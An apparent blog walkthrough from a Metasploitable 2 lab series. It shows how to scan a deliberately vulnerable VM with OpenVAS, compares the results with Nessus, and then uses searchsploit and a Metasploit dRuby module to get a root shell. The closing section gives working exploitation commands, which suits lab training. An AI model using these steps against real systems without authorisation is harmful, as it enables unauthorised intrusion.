Scanning Vulnerabilities with OpenVAS Vulneability Scanner
Metasploitable 2 Walkthrough (Part-4)
In this walkthrough, I’ll show you how to scan the target machine for vulnerabilities using OpenVAS - Open Vulnerability Assessment Scanner.
OpenVAS is a full-featured vulnerability scanner. Its capabilities include unauthenticated testing, authenticated testing.
You can get OpenVAS scanner from - http://www.openvas.org/ .
Or, you can simply just type: “apt install openvas” from Kali Linux Terminal.
The installation steps are a little bit handy but there is a nice guide on “How to install OpenVAS scanner” on Kali linux written by “HackerTarget” website.
You can check it here - https://hackertarget.com/install-openvas-gvm-on-kali/
I’d to say it’s the most complete and error-free installation guide on the internet.
Important thing is to keep note of the credentials generated by scanner during installation.
Also, HackerTarget provides a lot of online tools for penetration testers and security researchers. They have “Free IP and Network Tools” including, Traceroute, Test Ping, DNS Lookup, DNS Zone Transfer, Whois Lookup, GeoIP Lookup, and etc...
You can try those from this link - https://hackertarget.com/ip-tools/.
All right, Let’s get back to our OpenVAS scanner.
Vulnerability Scanning with OpenVAS
After successful installation of OpenVAS, we have to start its Scanner service and Manager service from terminal in order to use the Scanner.“service openvas-scanner start”
“service openvas-manager start”
Then we have to start the scanner.
“openvas-start”
“openvas-start”
A browser window will open as soon as the scanner is ready.
You have to login with the credentials generated by the scanner during installation.
I hope you will keep note of those credentials.
After successful login, you will see the scanner’s Dashboard.
You can see the current scanner’s detected vulnerabilities’ severities, your target’s topology, NVTs by Severity Class, CVEs by creation time and Tasks by status.
Above is the toolbar, that let’s you scan the network / hosts for vulnerabilities, view the scan results, change the scanner settings and much more.
I will show you how to scan the target for vulnerabilities with OpenVAS.
Let’s see.
To start a new scan, click “Scan” from toolbar and choose “Tasks”
Then, choose “Task Wizard”,
You will see the “Task Wizard” as below.
You need to provide target machine’s IP address. In my case, target’s IP address is 192.168.164.129. Then click “Start Scan”.
Now the scanner is started and we have to wait until it finishes its job.
We can see it’s scanning status as above; my scanner is started just now so the completion status is showing 1%.
You can click “Immediate Scan of IP x.x.x.x” to see the detail status.
Let’s check that out.
You can see the scanning status and you can also change the Scanner’s setting from here.
But we don’t need to change any settings for now.
The scanning task will take a while.
There we go, our scan task is finished, and its “Severity” is sky high as we are scanning the vulnerable machine “Metasploitable 2”.
All right, let’s check for the scan results. Click “Scans” from toolbar and choose “Results”.
There we go.
As we can see, OpenVAS has detected lots of vulnerabilities.
You can sort the vulnerabilities by Severity, just click “Severity”.
In our previous walkthrough part-3, we use Nessus to scan the same target (Metasploitable 2).
You may have noticed there are some vulnerabilities that “Nessus” didn't detect.
But OpenVAS found them.
Such as, TWiki XSS and Command Execution Vulnerabilities, dRubyDRB Multiple Remote Code Execution Vulnerability and JavaRMI remote code execution vulnerability.
As we can see, OpenVAS has detected 141 vulnerabilities, including 18 High, 33 Medium, 2 Low and 88 Informational vulnerabilities.
You can see them in the chart above.
Below is scan result page 2.
You can check the rest detected vulnerabilities results using navigational arrows at the right end of the page.
If you don't remember the Nessus scan results, you can check it in walkthrough Part-3. I recommend you should compare the two scanners’ results.
But it doesn’t mean “OpenVAS” is better than “Nessus”. My point is “always double check every step” before continuing to exploitation step.
Sometime you will need to use multiple tools just to verify a vulnerability.
“Always Double Check”.
Let’s move on to the “Exploitation” step. We have new vulnerabilities.
Let’s check out dRubyDRB Multiple Remote Code Execution Vulnerability.
As we can see, Metasploitable 2 has Distributed Ruby (dRubyDRB) version 1.6 and it’s has multiple Remote Code Execution Vulnerabilities.
Let’s search for that vulnerability with “searchsploit”.
“searchsploit distributed ruby"
There we go, we found the code execution exploit in Metasploit.
Let’s fire up Metasploit and search for that vulnerability.
“msfconsole”
“search DRB” (distributed Ruby)
There we go, we found “exploit/linux/misc/drb_remote_codeexec”.
Let’s try it.
“use exploit/linux/misc/drb_remote_codeexec”
We need to check the requirements for the exploit.
“show options”
The exploit only needs the target IP address “RHOSTS” option.
Let’s set it.
“set RHOSTS 192.168.164.129”
Target is set and ready to go.
Let’s start.
“exploit”
There we go, we got the shell.
And we got “root” access.
In this walkthrough, we use “OpenVAS” to scan the target for vulnerabilities and scan results are different from our previous “Nessus” scan.
We got some new vulnerabilities that Nessus didn't detect.
But It doesn’t mean OpenVAS is better than Nessus.
If you scan another targets, the results can be opposite.
So, always scan the target using multiple vulnerability scanners, port scanners and always Double Check for best practice.
You can check out some nice vulnerability scanners here;
See you in the next walkthrough and Good Luck.
Comments
Post a Comment